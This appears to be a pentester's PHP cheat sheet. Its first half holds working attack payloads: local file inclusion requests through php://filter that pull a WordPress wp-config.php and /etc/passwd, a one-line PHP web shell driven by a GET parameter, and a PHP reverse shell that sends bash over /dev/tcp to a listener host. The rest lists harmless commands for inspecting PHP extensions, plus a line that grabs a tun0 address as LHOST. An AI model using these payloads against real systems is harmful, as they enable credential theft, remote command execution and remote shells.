% php

# php filter LFI download
curl '<URL>?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php' | base64 -d > <OUTFILE>
curl '<URL>?page=php://filter/read=/resource=/etc/passwd'

# smallest php shell payload
<?=@`$_GET[1]`;
curl http:target/shell.php?1=pwd;ls
alternative: <?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

# check loaded extensions
php -m
php -m | grep -i "<extension_name>"
php --ini
// detailed extension information
php -i | grep -i "extension"
php -i | grep "extension_dir"
pecl list
pecl list | grep "extension_name"
// locations for PECL extensions
ls /etc/php/*/mods-available/
ls /etc/php/*/cli/conf.d/
ls /etc/php/*/apache2/conf.d/
ls /etc/php/*/fpm/conf.d/
find /etc/php -name "*.ini" -exec grep -l "extension=" {} \;
// via cli
php -a
print_r(get_loaded_extensions());

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
